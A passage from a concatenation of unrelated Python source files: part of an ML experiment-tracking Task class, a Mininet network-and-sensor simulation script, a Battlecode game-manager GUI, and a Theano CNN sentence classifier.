if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> ()
"""
Set offline mode, where all data and logs are stored in a local folder for later transmission.
:param offline_mode: If True, offline-mode is turned on and no communication to the backend is enabled.
:return:
"""
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return the offline-mode state. If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
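# Illustrative sketch (not part of the original module): toggling offline mode before
# any backend communication happens, then checking the state.
#
#   Task.set_offline(offline_mode=True)
#   assert Task.is_offline()
#   # tasks created from this point keep their data in the folder returned by
#   # get_offline_mode_folder(), to be sent later with report_offline_session()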
|
start_net_and_sensor.py
|
# coding=utf-8
import os, sys, pdb
import time
from threading import Thread, Lock, Condition
topo_path = os.path.abspath(os.path.join('..', '..', 'Topology'))
sen_path = os.path.abspath(os.path.join('..', '..', 'Sensor'))
blk_path = os.path.abspath(os.path.join('..', '..', 'Blockchain'))
sys.path.insert(0, topo_path)
sys.path.insert(0, sen_path)
sys.path.insert(0, blk_path)
from create_merge_topo import *
from sensor import *
from client import *
cv = Condition()
lock = Lock()
count = 0
nt = None
discovered_ips = []
def stop_net(net):
net.stop()
def start_net():
''' Start Mininet Topology'''
topo = NetworkTopo()
net = Mininet( topo=topo )
add_static_routes(net)
net.start()
return net
def run(i, hosts, lock, cv):
# note: also relies on the module-level `net` and `nt` set in the __main__ block below
global count
global nt
alias = create_alias()
lock.acquire()
compute_distances(net, hosts)
count += 1
lock.release()
cv.acquire()
if count < int(nt):
cv.wait()
else:
cv.notify_all()
cv.release()
lock.acquire()
create_traces(net, hosts)
lock.release()
(vtopo, traces) = create_virtual_topo_and_traces(alias, hosts)
(M,C) = create_merge_options(vtopo, traces)
(M, mtopo) = create_merge_topology(M, vtopo, C)
out = write_topo_to_file(i, mtopo, hosts)
c = configure_client("client1_config.json")
register_client(c)
#tfile = get_topo_filename("client1_config.json")
topo = get_topo_from_json(out)
trans = get_transactions_from_topo(topo)
c.send_transactions(trans)
def parse_cmd_line():
nt = sys.argv[1]
hosts = sys.argv[2:]
return (nt, hosts)
def startup(nt, hosts):
threads = []
for i in range(int(nt)):
thread = Thread(target=run, args=(i, hosts, lock, cv))
threads.append(thread)
thread.start()
for t in threads:
t.join()
print 'Threads finished'
def block_router(net, r):
cmd1 = 'iptables -P OUTPUT DROP'
cmd2 = 'iptables -P INPUT DROP'
cmd3 = 'iptables -P FORWARD DROP'
net[r].cmd(cmd1)
net[r].cmd(cmd2)
net[r].cmd(cmd3)
print '\nBlocked router ' + net[r].IP()
def unblock_router(net, r):
cmd1 = 'iptables -P OUTPUT ACCEPT'
cmd2 = 'iptables -P INPUT ACCEPT'
cmd3 = 'iptables -P FORWARD ACCEPT'
net[r].cmd(cmd1)
net[r].cmd(cmd2)
net[r].cmd(cmd3)
print '\nUnblocked router ' + net[r].IP()
if __name__ == '__main__':
if len(sys.argv) < 2:
print """\nUsage: python start.py <nt> <hosts>\n
<nt> = number of threads to be used to collect traces\n
<hosts> = sequence of hosts, separated by whitespace, that
each thread will use deterministically\n"""
sys.exit()
(net,topo) = start_network_number(1)
# Delete previously generated files..
os.system('./init.sh')
(nt, hosts) = parse_cmd_line()
# Spawn the threads that will run iTop and store the topology induced from each thread in the Blockchain
startup(nt, topo.sensors)
ips = get_responding_ips(hosts)
# Start one sensor
s = sensor('r3', 5, net, 'sensor_config.json', max_fail=3,
known_ips=ips, simulation=True, verbose=False)
s.start()
raw_input("\n\nPress any key when you want to tear down R5\n\n")
print '\nTearing down router R5...\n'
block_router(net, 'r5')
raw_input("\n\nPress any key when you want to run again R5\n\n")
unblock_router(net, 'r5')
time.sleep(5)
net.pingAll()
raw_input("\n\nPress any key when you want to quit\n\n")
s.stop()
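# Example invocation matching the usage message above (an illustrative sketch; Mininet
# typically requires root privileges, and the host names depend on the topology):
#   sudo python start_net_and_sensor.py 3 h1 h2 h3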
|
gui.py
|
import eel
import os
import battlecode_cli as cli
import threading
import sys
import json
import signal
import psutil
import player_plain
import battlecode as bc
target_dir = os.path.abspath(os.path.dirname(__file__))
print('Moving into', target_dir)
os.chdir(target_dir)
options = {'host':'0.0.0.0', 'port':6147, 'mode':'default'}
if sys.platform == 'win32':
options['host'] = 'localhost'
print('Starting eel')
eel.init('web')
game = None
def start_game(return_args):
global WINNER
WINNER = 0
# check mountpoint for maps first
c2 = os.path.abspath(os.path.join('/player/battlecode-maps', return_args['map']))
if 'NODOCKER' not in os.environ and os.path.exists(c2):
return_args['map'] = cli.get_map(c2)
else:
c1 = os.path.abspath(os.path.join('..', 'battlecode-maps', return_args['map']))
if os.path.exists(c1):
return_args['map'] = cli.get_map(c1)
else:
if 'testmap' not in return_args['map']:
print("Can't find map {} in {}, falling back to test map..",
return_args['map'],
os.path.abspath(os.path.join('..', 'battlecode-maps'))
)
if 'NODOCKER' not in os.environ:
print('(Also looked in /player/battlecode-maps, which should be mounted to the battlecode-maps directory of your scaffold)')
return_args['map'] = bc.GameMap.test_map()
if 'NODOCKER' in os.environ:
return_args['docker'] = False
return_args['dir_p1'] = os.path.abspath(os.path.join('..', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('..', return_args['dir_p2']))
else:
return_args['docker'] = True
return_args['dir_p1'] = os.path.abspath(os.path.join('/player', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('/player', return_args['dir_p2']))
return_args['terminal_viewer'] = False
return_args['extra_delay'] = 0
global game
(game, dockers, sock_file) = cli.create_game(return_args)
winner = None
try:
print("Running game...")
winner = cli.run_game(game, dockers, return_args, sock_file)
finally:
cli.cleanup(dockers, return_args, sock_file)
lock.release()
if winner == 'player1':
eel.trigger_end_game(1)()
elif winner == 'player2':
eel.trigger_end_game(2)()
else:
eel.trigger_end_game(0)()
print("Ready to run next game.")
@eel.expose
def get_viewer_data(turn):
if game != None and len(game.manager_viewer_messages) >= 1:
if turn >= len(game.manager_viewer_messages) or turn == -1:
turn = len(game.manager_viewer_messages) - 1
message = json.loads(game.manager_viewer_messages[turn])
message['turn'] = turn
return message
else :
return {'width':0, 'height': 0, 'earth' : [], 'mars': [], 'turn':0}
@eel.expose
def run_game(return_args):
if not lock.acquire(blocking=False):
return "Fail"
t1 = threading.Thread(target=start_game,args=(return_args,))
t1.start()
return "success"
@eel.expose
def get_maps():
if 'NODOCKER' in os.environ:
map_dir = os.path.abspath('../battlecode-maps')
else:
map_dir = '/battlecode/battlecode-maps'
maps = [o for o in os.listdir(map_dir)
if 'bc18map' in o or 'bc18t' in o]
maps.append('testmap.bc18map')
if 'NODOCKER' not in os.environ:
try:
for o in os.listdir('/player/battlecode-maps'):
if o not in maps:
maps.append(o)
except:
pass
return maps
@eel.expose
def get_player_dirs():
if 'NODOCKER' in os.environ:
player_dir = os.path.abspath('..')
else:
player_dir = '/player'
players = []
for o in os.listdir(player_dir):
if o.startswith('.') or o in ('battlecode', 'battlecode-manager'):
continue
full_path = os.path.join(player_dir, o)
if not os.path.isdir(full_path):
continue
if os.path.exists(os.path.join(full_path, 'run.sh')):
players.append(o)
return players
# end-game result codes (see trigger_end_game above): 0 = not ended, 1 = red, 2 = blue
@eel.expose
def get_player_logs():
if game != None:
if all('logger' in player for player in game.players):
logs = [player['logger'].logs.getvalue() for player in game.players]
return logs
else:
return ["", "", "", ""]
return ["NULL", "NULL", "NULL", "NULL"]
@eel.expose
def end_game():
global game
if game is not None:
game.winner = 'player3'
game.disconnected = True
game.game_over = True
return ""
def reap_children(timeout=3):
"Tries hard to terminate and ultimately kill all the children of this process."
def on_terminate(proc):
pass
# print("process {} terminated with exit code {}".format(proc, proc.returncode))
procs = psutil.Process().children(recursive=True)
# send SIGTERM
for p in procs:
p.terminate()
gone, alive = psutil.wait_procs(procs, timeout=timeout, callback=on_terminate)
if alive:
# send SIGKILL
for p in alive:
# print("process {} survived SIGTERM; trying SIGKILL" % p.pid)
p.kill()
gone, alive = psutil.wait_procs(alive, timeout=timeout, callback=on_terminate)
if alive:
# give up
for p in alive:
print("process {} survived SIGKILL; giving up" % p.pid)
@eel.expose
def stop_manager():
print("Shutting manager down.")
player_plain.reap(psutil.Process())
procs = psutil.Process().kill()
print("=== Ready! ===")
print("To play games open http://localhost:6147/run.html in your browser on Mac/Linux/WindowsPro, or http://192.168.99.100:6147/run.html on Windows10Home.")
lock = threading.Lock()
eel.start('run.html', options=options, block=False)
while True:
eel.sleep(1.0)
|
conv_net_sentence2_parallel.py
|
"""
Sample code for
Convolutional Neural Networks for Sentence Classification
http://arxiv.org/pdf/1408.5882v2.pdf
Much of the code is modified from
- deeplearning.net (for ConvNet classes)
- https://github.com/mdenil/dropout (for dropout)
- https://groups.google.com/forum/#!topic/pylearn-dev/3QbKtCumAW4 (for Adadelta)
"""
import cPickle
import numpy as np
from collections import defaultdict, OrderedDict
import theano
import theano.tensor as T
from theano import printing
import re
import warnings
import sys
import time
from multiprocessing import Process
from conv_net_classes import *
warnings.filterwarnings("ignore")
#different non-linearities
def ReLU(x):
y = T.maximum(0.0, x)
return(y)
def Sigmoid(x):
y = T.nnet.sigmoid(x)
return(y)
def Tanh(x):
y = T.tanh(x)
return(y)
def Iden(x):
y = x
return(y)
# parallel_id: 0, 1, ..., 10
# parallel_num: 10
def cand_output(parallel_id, parallel_num, parallel_batch_size, type, iteration_i, label, best_val_perf, cand_n_test_batches, \
cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets2_shape0):
#start_time = time.time()
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label) + '_' + str(parallel_id), 'w')
if best_val_perf != 0:
if parallel_id <= parallel_num - 1:
for i in xrange(parallel_id * parallel_batch_size, (parallel_id + 1) * parallel_batch_size ):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
#print "i: ", i
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
try: # IndexError: index 153926 is out of bounds for axis 0 with size 153926
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
except IndexError:
pass
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for i in xrange(parallel_id * parallel_batch_size, cand_n_test_batches):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
if i != cand_n_test_batches - 1:
for j in range(0, batch_size):
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets2_shape0 % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.close()
#print "testing time: ", time.time()-start_time
else:
cand_output_test.close()
#print "testing time: ", time.time()-start_time
def train_conv_net(iteration_i, type, label, datasets,
U,
img_w=300,
filter_hs=[3, 4, 5],
hidden_units=[100,3],
dropout_rate=[0.5],
shuffle_batch=True,
n_epochs=25,
batch_size=100,
lr_decay = 0.95,
conv_non_linear="relu",
activations=[Iden],
sqr_norm_lim=9,
non_static=True,
):
"""
Train a simple conv net
img_h = sentence length (padded where necessary)
img_w = word vector length (300 for word2vec)
filter_hs = filter window sizes
hidden_units = [x,y] x is the number of feature maps (per filter window), and y is the penultimate layer
sqr_norm_lim = s^2 in the paper
lr_decay = adadelta decay parameter
"""
print U
print len(U)
print len(U[0])
#raw_input("continue?")
rng = np.random.RandomState(3435)
img_h = len(datasets[0][0])-1
#t_img_h = len(test_dataset[0][0])-1
#print "img_h, t_img_h: ", img_h, ', ', t_img_h
filter_w = img_w
feature_maps = hidden_units[0]
filter_shapes = []
pool_sizes = []
for filter_h in filter_hs:
filter_shapes.append((feature_maps, 1, filter_h, filter_w))# feature_maps = 100; filter_h = 3, 4, 5; filter_w = 300
pool_sizes.append((img_h-filter_h+1, img_w-filter_w+1))
parameters = [("image shape",img_h,img_w),("filter shape",filter_shapes), ("hidden_units",hidden_units),
("dropout", dropout_rate), ("batch_size",batch_size),("non_static", non_static),
("learn_decay",lr_decay), ("conv_non_linear", conv_non_linear), ("non_static", non_static)
,("sqr_norm_lim",sqr_norm_lim),("shuffle_batch",shuffle_batch)]
print parameters
#define model architecture
# generate symbolic variables for input (x and y represent a
# minibatch)
index = T.lscalar()
x = T.matrix('x') # data, presented as rasterized images
y = T.ivector('y') # labels, presented as 1D vector of [int] labels
Words = theano.shared(value = U, name = "Words")
zero_vec_tensor = T.vector()
zero_vec = np.zeros(img_w)
set_zero = theano.function([zero_vec_tensor], updates=[(Words, T.set_subtensor(Words[0,:], zero_vec_tensor))], allow_input_downcast=True)
layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((x.shape[0],1,x.shape[1],Words.shape[1]))
conv_layers = []
layer1_inputs = []
for i in xrange(len(filter_hs)):
filter_shape = filter_shapes[i]
pool_size = pool_sizes[i]
conv_layer = LeNetConvPoolLayer(rng, input=layer0_input,image_shape=(batch_size, 1, img_h, img_w),
filter_shape=filter_shape, poolsize=pool_size, non_linear=conv_non_linear)
layer1_input = conv_layer.output.flatten(2)
conv_layers.append(conv_layer)
layer1_inputs.append(layer1_input)
layer1_input = T.concatenate(layer1_inputs,1)
hidden_units[0] = feature_maps*len(filter_hs)
classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)
#define parameters of the model and update functions using adadelta
params = classifier.params
for conv_layer in conv_layers:
params += conv_layer.params
if non_static:
#if word vectors are allowed to change, add them as model parameters
params += [Words]
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
grad_updates = sgd_updates_adadelta(params, dropout_cost, lr_decay, 1e-6, sqr_norm_lim)
#shuffle dataset and assign to mini batches. if dataset size is not a multiple of mini batches, replicate
#extra data (at random)
print "datasets[0].shape[0]: ", datasets[0].shape[0]
np.random.seed(3435)
if datasets[0].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[0].shape[0] % batch_size
train_set = np.random.permutation(datasets[0])
extra_data = train_set[:extra_data_num]
new_data=np.append(datasets[0],extra_data,axis=0)
else:
new_data = datasets[0]
print "datasets[1].shape[0]: ", datasets[1].shape[0]
if datasets[1].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[1].shape[0] % batch_size
test_set = np.random.permutation(datasets[1])
extra_data = test_set[:extra_data_num]
test_new_data=np.append(datasets[1],extra_data,axis=0)
else:
test_new_data = datasets[1]
print "test_new_data.shape[0]: ", test_new_data.shape[0]
n_test_batches = test_new_data.shape[0]/batch_size
print "datasets[2].shape[0]: ", datasets[2].shape[0]
if datasets[2].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[2].shape[0] % batch_size
test_set = np.random.permutation(datasets[2])
extra_data = test_set[:extra_data_num]
cand_test_new_data=np.append(datasets[2],extra_data,axis=0)
else:
cand_test_new_data = datasets[2]
print "cand_test_new_data.shape[0]: ", cand_test_new_data.shape[0]
cand_n_test_batches = cand_test_new_data.shape[0]/batch_size
"""
length = len(new_data)
print length
new_data_part1 = np.random.permutation(new_data[:train_val_boundary, :])
new_data_part2 = np.random.permutation(new_data[train_val_boundary:, :])
new_data = np.append(new_data_part1, new_data_part2, axis = 0)
"""
new_data = np.random.permutation(new_data)
#ratio = float(train_val_boundary) / float(new_data.shape[0])
#print ratio
n_batches = new_data.shape[0]/batch_size
n_train_batches = int(np.round(n_batches*0.9))
#n_train_batches = int(np.round(n_batches*ratio))
#divide train set into train/val sets
#test_set_x = datasets[1][:,:img_h]
#test_set_y = np.asarray(datasets[1][:,-1],"int32")
test_y = np.asarray(datasets[1][:,-1],"int32")
test_set = test_new_data[:n_test_batches * batch_size, :]
cand_test_y = np.asarray(datasets[2][:,-1],"int32")
cand_test_set = cand_test_new_data[:cand_n_test_batches * batch_size, :]
train_set = new_data[:n_train_batches*batch_size,:]
#train_set = train_new_data[:n_train_batches*batch_size,:]
val_set = new_data[n_train_batches*batch_size:,:]
train_set_x, train_set_y = shared_dataset((train_set[:,:img_h],train_set[:,-1]))
val_set_x, val_set_y = shared_dataset((val_set[:,:img_h],val_set[:,-1]))
test_set_x, test_set_y = shared_dataset((test_set[:,:img_h], test_set[:, -1]))
cand_test_set_x, cand_test_set_y = shared_dataset((cand_test_set[:,:img_h], cand_test_set[:, -1]))
n_val_batches = n_batches - n_train_batches
#n_val_batches = t_n_batches
val_model = theano.function([index], classifier.errors(y),
givens={
x: val_set_x[index * batch_size: (index + 1) * batch_size],
y: val_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
#val_output_sigmoid = theano.function([index], classifier.predict_p(val_set_x[index * batch_size: (index + 1) * batch_size]))
#compile theano functions to get train/val/test errors
#classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)
test_model = theano.function([index], classifier.errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
real_test_model = theano.function ( [index], classifier.errors(y),
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
train_model = theano.function([index], cost, updates=grad_updates,
givens={
x: train_set_x[index*batch_size:(index+1)*batch_size],
y: train_set_y[index*batch_size:(index+1)*batch_size]},
allow_input_downcast = True)
print "\n*****************************"
print train_set_y.eval()
#print type(test_set_y)
test_pred_layers = []
test_size = test_set_x.shape[0].eval()
print "test_size = test_set_x.shape[0]: ", test_size
print "x.flatten(): ", x.flatten()
print "img_h: ", img_h
print "Words.shape[0]: ", Words.shape[0].eval()
print "Words.shape[1]: ", Words.shape[1].eval()
# x.flatten(): A copy of the input array, flattened to one dimension.
#test_layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((test_size,1,img_h,Words.shape[1])) # change test_size to batch_size
test_layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((x.shape[0],1,x.shape[1],Words.shape[1]))
for conv_layer in conv_layers:
test_layer0_output = conv_layer.predict(test_layer0_input, batch_size) # change test_size to batch_size
test_pred_layers.append(test_layer0_output.flatten(2))
test_layer1_input = T.concatenate(test_pred_layers, 1)
print "test_layer1_input: ", test_layer1_input
test_y_pred = classifier.predict(test_layer1_input)
test_y_pred_p = classifier.predict_p(test_layer1_input)
test_error = T.mean(T.neq(test_y_pred, y))
test_model_all = theano.function([x,y], test_error, allow_input_downcast = True)
#test_model_all_3 = theano.function([x], test_y_pred, allow_input_downcast=True)
#test_model_final_layer = theano.function([x], test_y_pred_p, allow_input_downcast=True)
test_model_all_3 = theano.function([index], test_y_pred,
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size]}, allow_input_downcast=True)
test_model_final_layer = theano.function([index], test_y_pred_p,
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
cand_test_model_all_3 = theano.function([index], test_y_pred,
givens={
x: cand_test_set_x[index * batch_size: (index + 1) * batch_size]}, allow_input_downcast=True)
cand_test_model_final_layer = theano.function([index], test_y_pred_p,
givens={
x: cand_test_set_x[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
#start training over mini-batches
print '... training'
epoch = 0
best_val_perf = 0
val_perf = 0
test_perf = 0
cost_epoch = 0
while (epoch < n_epochs):
#while (epoch < 1):
start_time = time.time()
epoch = epoch + 1
if shuffle_batch:
for minibatch_index in np.random.permutation(range(n_train_batches)):
cost_epoch = train_model(minibatch_index)
set_zero(zero_vec)
else:
for minibatch_index in xrange(n_train_batches):
cost_epoch = train_model(minibatch_index)
set_zero(zero_vec)
train_losses = [test_model(i) for i in xrange(n_train_batches)]
train_perf = 1 - np.mean(train_losses)
val_losses = [val_model(i) for i in xrange(n_val_batches)]
val_perf = 1- np.mean(val_losses)
print label,
print(' epoch: %i, training time: %.2f secs, train perf: %.2f %%, val perf: %.2f %%' % (epoch, time.time()-start_time, train_perf * 100., val_perf*100.))
if val_perf >= best_val_perf:
best_val_perf = val_perf
#test_loss = test_model_all(test_set_x,test_set_y)
#test_perf = 1- test_loss
print "n_test_batches: ", n_test_batches
test_losses = [real_test_model(i) for i in xrange(n_test_batches)]
#test_losses = [real_test_model(0)]
test_perf = 1 - np.mean(test_losses)
print "label ", label,
print (' test perf: %.2f %%' % (test_perf*100.))
#val_sig = [val_output_sigmoid(i) for i in xrange(n_val_batches)]
#print val_sig
#test_y_pred_cur = test_model_all_3(test_set_x)
#test_y_final_layer = test_model_final_layer(test_set_x)
#test_y_pred_cur = [test_model_all_3(i) for i in xrange(n_test_batches)]
#test_y_final_layer = [test_model_final_layer(i) for i in xrange(n_test_batches)]
#test_final_layer = ""
start_time = time.time()
print "outputting test result..."
#output_test = open("multi_classifiers/mr_folder/true_and_pred_value" + str(label), 'w')
output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/true_and_pred_value" + str(label), 'w')
if best_val_perf != 0:
for i in xrange(n_test_batches):
test_y_pred_cur = test_model_all_3(i)
test_y_final_layer = test_model_final_layer(i)
#print "i: ", i
if i != n_test_batches - 1:
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.write(str(test_y[i * batch_size + j]) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets[1].shape[0] % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.write(str(test_y[i * batch_size + j]) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.close()
#return test_perf
else:
output_test.close()
#return 0
parallel_num = 10 # parallel number, actual parallel threads will be 11
parallel_batch_size = cand_n_test_batches / parallel_num
processV = []
for parallel_id in range(0, parallel_num + 1):
processV.append(Process(target = cand_output, args = ( parallel_id, parallel_num, parallel_batch_size, type, iteration_i, label, best_val_perf, cand_n_test_batches, \
cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets[2].shape[0], )))
for parallel_id in range(0, parallel_num + 1):
processV[parallel_id].start()
for parallel_id in range(0, parallel_num + 1):
processV[parallel_id].join()
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label), 'w')
for i in range(0, parallel_num + 1):
parallel_id = str(i)
f = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label) + '_' + parallel_id, 'r')
for line in f:
cand_output_test.write(line)
f.close()
cand_output_test.close()
print "testing time: ", time.time()-start_time
#cand_output(parallel_id, parallel_size, type, iteration_i, label, best_val_pref, cand_n_test_batches, \
#cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets[2].shape[0])
"""
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label), 'w')
if best_val_perf != 0:
for i in xrange(cand_n_test_batches):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
#print "i: ", i
if i != cand_n_test_batches - 1:
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets[2].shape[0] % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.close()
print "testing time: ", time.time()-start_time
return test_perf
else:
cand_output_test.close()
print "testing time: ", time.time()-start_time
return 0
"""
"""
for i in range(test_set_y.shape[0]):
output_test.write( str(test_set_y[i]) + '\t' + str(test_y_pred_cur[i])+ '\t' + str(test_y_final_layer[i] ) + '\n')
"""
"""
# save the final classifier
with open('trained_CNN.pkl', 'w') as f:
cPickle.dump(classifier, f)
"""
return test_perf
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch every time
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(np.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(np.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
return shared_x, T.cast(shared_y, 'int32')
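# Worked example (illustrative, not part of the original script): wrapping a small
# numpy dataset so it can be sliced inside theano `givens`; the shapes are assumptions.
#
#   xs, ys = np.zeros((10, 56), dtype="int"), np.zeros(10, dtype="int")
#   shared_x, shared_y = shared_dataset((xs, ys))
#   # shared_x is a floatX shared matrix, shared_y an int32 cast of the shared label vector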
def sgd_updates_adadelta(params,cost,rho=0.95,epsilon=1e-6,norm_lim=9,word_vec_name='Words'):
"""
adadelta update rule, mostly from
https://groups.google.com/forum/#!topic/pylearn-dev/3QbKtCumAW4 (for Adadelta)
"""
updates = OrderedDict({})
exp_sqr_grads = OrderedDict({})
exp_sqr_ups = OrderedDict({})
gparams = []
for param in params:
empty = np.zeros_like(param.get_value())
exp_sqr_grads[param] = theano.shared(value=as_floatX(empty),name="exp_grad_%s" % param.name)
gp = T.grad(cost, param)
exp_sqr_ups[param] = theano.shared(value=as_floatX(empty), name="exp_grad_%s" % param.name)
gparams.append(gp)
for param, gp in zip(params, gparams):
exp_sg = exp_sqr_grads[param]
exp_su = exp_sqr_ups[param]
up_exp_sg = rho * exp_sg + (1 - rho) * T.sqr(gp)
updates[exp_sg] = up_exp_sg
step = -(T.sqrt(exp_su + epsilon) / T.sqrt(up_exp_sg + epsilon)) * gp
updates[exp_su] = rho * exp_su + (1 - rho) * T.sqr(step)
stepped_param = param + step
if (param.get_value(borrow=True).ndim == 2) and (param.name!='Words'):
col_norms = T.sqrt(T.sum(T.sqr(stepped_param), axis=0))
desired_norms = T.clip(col_norms, 0, T.sqrt(norm_lim))
scale = desired_norms / (1e-7 + col_norms)
updates[param] = stepped_param * scale
else:
updates[param] = stepped_param
return updates
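# Minimal sketch of using the update rule above (illustrative only, not part of the
# original training script): a single scalar shared parameter driven towards 3.0.
#
#   w = theano.shared(np.asarray(0.0, dtype=theano.config.floatX), name='w')
#   loss = T.sqr(w - 3.0)
#   step = theano.function([], loss, updates=sgd_updates_adadelta([w], loss))
#   for _ in range(100):
#       step()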
def as_floatX(variable):
if isinstance(variable, float):
return np.cast[theano.config.floatX](variable)
if isinstance(variable, np.ndarray):
return np.cast[theano.config.floatX](variable)
return theano.tensor.cast(variable, theano.config.floatX)
def safe_update(dict_to, dict_from):
"""
re-make update dictionary for safe updating
"""
for key, val in dict(dict_from).iteritems():
if key in dict_to:
raise KeyError(key)
dict_to[key] = val
return dict_to
def get_idx_from_sent(sent, word_idx_map, max_l=51, k=300, filter_h=5):
"""
Transforms sentence into a list of indices. Pad with zeroes.
"""
x = []
pad = filter_h - 1
for i in xrange(pad):
x.append(0)
words = sent.split()
for word in words:
if word in word_idx_map:
x.append(word_idx_map[word])
while len(x) < max_l+2*pad:
x.append(0)
return x
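# Worked example (values chosen for illustration): with filter_h=3 the pad is 2, so
#   get_idx_from_sent("good movie", {"good": 1, "movie": 2}, max_l=5, k=300, filter_h=3)
# returns [0, 0, 1, 2, 0, 0, 0, 0, 0]  (two leading pads, the word indices, zero-padded to max_l + 2*pad = 9)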
def make_idx_data_cv(revs, word_idx_map, cv, max_l=51, k=300, filter_h=5):
"""
Transforms sentences into a 2-d matrix.
"""
train, test, candidate_test = [], [], []
for rev in revs:
sent = get_idx_from_sent(rev["text"], word_idx_map, max_l, k, filter_h)
sent.append(rev["y"])
"""
if rev["split"]==cv:
test.append(sent)
else:
train.append(sent)
"""
if rev["split"]== 0:
test.append(sent)
